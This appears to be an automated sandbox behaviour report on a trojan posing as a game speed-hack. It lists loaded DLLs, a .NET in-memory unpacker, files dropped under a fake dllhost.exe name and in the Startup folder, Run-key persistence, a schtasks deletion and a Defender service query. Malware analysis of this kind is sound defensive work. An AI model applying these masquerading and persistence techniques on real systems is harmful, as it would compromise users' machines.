Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: thumbcache.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: version.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: wldp.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: profapi.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: shfolder.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: version.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: wldp.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: profapi.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: shfolder.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: version.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: wldp.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: profapi.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: shfolder.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: version.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: wldp.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: profapi.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: shfolder.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: version.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: wldp.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: profapi.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: shfolder.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: version.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: wldp.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: profapi.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: shfolder.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: version.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: wldp.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: profapi.dll
Source: C:\ProgramData\dllhost.exe	Section loaded: uxtheme.dll

Source: C:\ProgramData\dllhost.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

Jump to behavior

Data Obfuscation

.NET source code contains potential unpacker

Source: SpeedHack666Cheat (no VM detected).exe, JPIGAIGLMLGAPAPCOMNMCOFGCCHOODAODJNE.cs	.Net Code: AENHFKOMDOELCJJKFJCDPBLMPIFDPLMEIOHL System.Reflection.Assembly.Load(byte[])
Source: ClickMe.exe.0.dr, JPIGAIGLMLGAPAPCOMNMCOFGCCHOODAODJNE.cs	.Net Code: AENHFKOMDOELCJJKFJCDPBLMPIFDPLMEIOHL System.Reflection.Assembly.Load(byte[])
Source: dllhost.exe.0.dr, JPIGAIGLMLGAPAPCOMNMCOFGCCHOODAODJNE.cs	.Net Code: AENHFKOMDOELCJJKFJCDPBLMPIFDPLMEIOHL System.Reflection.Assembly.Load(byte[])
Source: 0.2.SpeedHack666Cheat (no VM detected).exe.37d4268.1.raw.unpack, JPIGAIGLMLGAPAPCOMNMCOFGCCHOODAODJNE.cs	.Net Code: AENHFKOMDOELCJJKFJCDPBLMPIFDPLMEIOHL System.Reflection.Assembly.Load(byte[])
Source: 0.2.SpeedHack666Cheat (no VM detected).exe.386da98.0.raw.unpack, JPIGAIGLMLGAPAPCOMNMCOFGCCHOODAODJNE.cs	.Net Code: AENHFKOMDOELCJJKFJCDPBLMPIFDPLMEIOHL System.Reflection.Assembly.Load(byte[])
Source: 87078a174f1e0ed9d58afdf2d6d178c3.exe.2.dr, JPIGAIGLMLGAPAPCOMNMCOFGCCHOODAODJNE.cs	.Net Code: AENHFKOMDOELCJJKFJCDPBLMPIFDPLMEIOHL System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Code function: 0_2_00B55CC8 push cs; iretd	0_2_00B55CD4
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Code function: 0_2_00B553B7 push ebx; iretd	0_2_00B553BD
Source: C:\ProgramData\dllhost.exe	Code function: 2_2_00848A50 push esp; iretd	2_2_00848F09
Source: C:\ProgramData\dllhost.exe	Code function: 2_2_04855CC8 push cs; iretd	2_2_04855CD4
Source: C:\ProgramData\dllhost.exe	Code function: 2_2_048553B7 push ebx; iretd	2_2_048553BD
Source: C:\ProgramData\dllhost.exe	Code function: 26_2_04845CC8 push cs; iretd	26_2_04845CD4
Source: C:\ProgramData\dllhost.exe	Code function: 26_2_048453B7 push ebx; iretd	26_2_048453BD
Source: C:\ProgramData\dllhost.exe	Code function: 37_2_04845CC8 push cs; iretd	37_2_04845CD4
Source: C:\ProgramData\dllhost.exe	Code function: 37_2_048453B7 push ebx; iretd	37_2_048453BD
Source: C:\ProgramData\dllhost.exe	Code function: 38_2_04855CC8 push cs; iretd	38_2_04855CD4
Source: C:\ProgramData\dllhost.exe	Code function: 38_2_048553B7 push ebx; iretd	38_2_048553BD
Source: C:\ProgramData\dllhost.exe	Code function: 39_2_009A5CC8 push cs; iretd	39_2_009A5CD4
Source: C:\ProgramData\dllhost.exe	Code function: 39_2_009A53B7 push ebx; iretd	39_2_009A53BD
Source: C:\ProgramData\dllhost.exe	Code function: 41_2_04845CC8 push cs; iretd	41_2_04845CD4
Source: C:\ProgramData\dllhost.exe	Code function: 41_2_048453B7 push ebx; iretd	41_2_048453BD
Source: C:\ProgramData\dllhost.exe	Code function: 42_2_00995CC8 push cs; iretd	42_2_00995CD4
Source: C:\ProgramData\dllhost.exe	Code function: 42_2_009953B7 push ebx; iretd	42_2_009953BD

Source: C:\ProgramData\dllhost.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\87078a174f1e0ed9d58afdf2d6d178c3.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	File created: C:\ClickMe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	File created: C:\ProgramData\dllhost.exe	Jump to dropped file

Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe

File created: C:\ProgramData\dllhost.exe

Jump to dropped file

Boot Survival

Creates autostart registry keys with suspicious names

Source: C:\ProgramData\dllhost.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 87078a174f1e0ed9d58afdf2d6d178c3

Jump to behavior

Drops PE files to the startup folder

Source: C:\ProgramData\dllhost.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\87078a174f1e0ed9d58afdf2d6d178c3.exe

Jump to dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\ProgramData\dllhost.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /delete /tn CleanSweepCheck /f

Source: C:\ProgramData\dllhost.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\87078a174f1e0ed9d58afdf2d6d178c3.exe

Jump to behavior

Source: C:\ProgramData\dllhost.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\87078a174f1e0ed9d58afdf2d6d178c3.exe

Jump to behavior

Source: C:\ProgramData\dllhost.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 87078a174f1e0ed9d58afdf2d6d178c3	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 87078a174f1e0ed9d58afdf2d6d178c3	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run 87078a174f1e0ed9d58afdf2d6d178c3	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run 87078a174f1e0ed9d58afdf2d6d178c3	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\sc.exe sc query windefend

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
